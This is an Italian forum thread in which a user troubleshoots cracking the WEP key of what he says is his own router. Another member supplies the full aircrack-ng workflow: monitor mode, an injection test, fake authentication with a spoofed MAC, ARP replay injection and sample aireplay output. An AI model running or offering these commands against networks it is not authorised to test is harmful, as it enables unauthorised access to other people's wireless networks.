Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: problema aircrack

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    9

    Question problema aircrack

    salve a tutti e complimenti per il forum... ho visto che siete molto ferrati in materia...
    appassionato delle reti, ho voluto provare la sicurezza della chiave wep del mio router di alice...
    ho eseguito tutta la procedura airodump poi aireplay e dopo 3 ore ho ottenuto 50000 dati e però pochi arp (63)
    effettuo l'aircrack ma mi dice fallito e di aspettare altri 5000 ivs... e cosi lo fa da quando ero a 30000 dati...
    come mai?

    ho anche un immagine ma non so come postarla...

    ringrazio anticipatamente per le risposte...

    EDIT: la procedura che ho seguito è:
    airodump-ng wlan0
    airodump-ng -w wep -c "canale ap" --bssid "bssid ap" wlan0
    aireplay-ng -1 0 -a "bssid ap" wlan0
    aireplay-ng -3 -b "bssid ap" wlan0
    aircrack-ng wep-01.cap

    ogni processo in una nuova console senza chiudere le altre...

  2. #2
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    1) la tua scheda supporta l'injection? controllalo con
    Code:
    aireplay-ng mon0 -9
    2) metti la tua scheda in monitor mode con airmon-ng
    Code:
    airmon-ng start wlan0
    3) quando dai il comando per la fake auth, devi impostare sia il parametro per ripeterla continuamente, sia quello per indicare il MAC del "fake client". ad esempio:
    Code:
    aireplay-ng -1 30 -e **AP ESSID** -a **AP BSSID** -h **FAKE-MAC** mon0
    dove "30" sono i secondi che aireplay attende prima di fare un'altra falsa autenticazione.


    4) quando fai l'injection dei pacchetti, specifica con " -h " il MAC del client autenticato, e con " -x " il numero di pacchetti ARP da iniettare ogni secondo. esempio:
    Code:
    aireplay-ng -3 -b **AP BSSID** -h **MAC CLIENT AUTENTICATO** -x 500 mon0
    il resto mi sembra apposto...

    ciao

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    9

    Default

    per l'injection verifico e ti faccio sapere però l'airmon gia lo facevo anzi ho provato anche a fissarlo sul canale dell'ap
    non ho capito solo il 3 e il 4 punto quando farli e sopratutto il fake-mac come lo faccio ad impostare?

    grazie!

  4. #4
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    per prima cosa metti airodump a registrare i dati sull'interfaccia mon0 e , se non è presente un client già autenticato, metti aireplay con la fake auth (punto 3).
    --queste sono due console che devi tenere aperte durante tutto il processo.--

    una volta fatto questo, inizi in un'altra console l'ARP REPLAY con il comando nel punto 4 per aumentare il traffico.

    se le operazioni sono andate a buon fine, in airodump dovresti vedere il numero di IVs catturati salire velocemente.

    il fake-mac come lo faccio ad impostare?
    l'opzione -h serve a specificare il fake-MAC

    ciao!

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    9

    Default

    ciao!
    ho fatto tutto ma il problema è che ho superato anche i 50000 data ma la key non me la rileva dice di riprovare dopo 5000 ivs.
    ho notato però che di tutti questi dati gli ACK "se non ricordo male il nome, cmq quelli di aireplay" erano pochi se non sbaglio 9...
    ho provato anche la procedura di attacco senza client connessi ma niente da fare...
    cosa posso provare? il segnale è buono e la scheda wifi dovrebbe supportare l'injection è una intel 5100...

    che si può provare?

  6. #6
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    1) postare l'output (anche su pastebin per non riempire il forum) non sarebbe male, perchè qui c'è qualcosa che non mi torna:
    ho fatto tutto ma il problema è che ho superato anche i 50000 data ma la key non me la rileva dice di riprovare dopo 5000 ivs.
    se hai meno di 5000 IVs è probabile che non riesca a crackare la chiave, controlla bene i dati che hai raccolto.. non ti può dire 50000, altrimenti avresti 50000 IVs!!

    ho notato però che di tutti questi dati gli ACK "se non ricordo male il nome, cmq quelli di aireplay" erano pochi se non sbaglio 9...
    2) aireplay ti dovrebbe dire i pacchetti che invia, le richieste ARP e gli ACK ricevuti. tutti questi dovrebbero essere numeri molto alti, sicuramente non 9 ad esempio:
    Code:
    root@bt:~# aireplay-ng -3 -b **:**:**:**:**:11 -h **:**:**:**:**:22 -x 600 mon0
    The interface MAC (**:**:**:**:**:00) doesn't match the specified MAC (-h).
            ifconfig mon0 hw ether **:**:**:**:**:22
    17:35:07  Waiting for beacon frame (BSSID: **:**:**:**:**:11) on channel 1
    Saving ARP requests in replay_arp-0201-173507.cap
    You should also start airodump-ng to capture replies.
    ^Cad 224340 packets (got 152444 ARP requests and 65079 ACKs), sent 108863 packets...(600 pps)
    in questa finestra ti da qualche errore?

    cosa posso provare? il segnale è buono e la scheda wifi dovrebbe supportare l'injection è una intel 5100...
    3) la tua scheda dovrebbe essere supportata. comunque hai provato il TEST dell'injection con aireplay che ti avevo scritto sopra?

    4) ultima cosa.. nella shell di airodump quali valori ti scrive durante l'injection sotto "#DATA" e "#/s" (cioè, rispettivamente, la quantità di data catturata e quella catturata per ogni secondo)

    ciao

  7. #7
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    9

    Default

    prima di tutto grazie per la risposta...

    allora,
    1) dopo 3 ore che un client si erad degnato di connettersi anche se poi si è disconnesso avevo 123030 beacons, 55801 data, 0 #/s, packets (dovrebbbero essere quelli ricevuti da me) 6565846. se facevo aircrack mi diceva di ripetere dopo altri 5000ivs ma mi portava 55710 ivs!
    2) aireplay non mi dava nessun errore e avevo
    "read 994093 packets (got 63 ARP and 0 ACKs), send 6582327 packets"
    la seconda volta che provai invece dopo un oretta avevo 2-3 arp e 6-7 acks...
    3) se per test dell'injection ti rifersici a aireplay-ng -3 -b **AP BSSID** -h **MAC CLIENT AUTENTICATO** -x 500 mon0 questo l'ho fatto

    ecco tutto

    grazie per la disponibilità!

  8. #8
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    sorry, mi ero fermato alle "apparenze" sulla tua scheda! stavo leggendo qualche thread in giro e la tua scheda è supportata, ma sulla pre-final c'erano problemi con l'injection. (non so se sono stati risolti nella final) dai un occhiata a QUESTO thread.
    quindi sei sei SICURO di fare tutto bene il problema potrebbe essere quello.
    parlano anche di problemi riguardo la distanza quindi ti consiglio di fare i test con un AP nelle immediate vicinanze!

    comunque il test per l'injection è questo:
    Code:
    aireplay-ng mon0 -9
    anche se a quanto pare non è del tutto esatto!

    se hai la possibilità di provare con altre schede sarebbe la cosa migliore, perchè risolvere contemporaneamente un problema "teorico" sul cracking delle WEP, ed uno "pratico" sul dispositivo, è un pò complicato :P

    ciao e facci sapere!

  9. #9
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    9

    Default

    ok, proverò dopo l'esame con un altro computer...
    posso provare anche con un mac... bisogna usare sempre backtrack o il mac gia ha in se tutte le cose aireplay aircrack ecc ecc?

  10. #10
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    9

    Default

    ho provato con una broadcom...
    TUTTO E' ANDATO PER IL MEGLIO IN 5 MINUTI !!!!

    siete grandi,

    grazie infinite reversal!

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •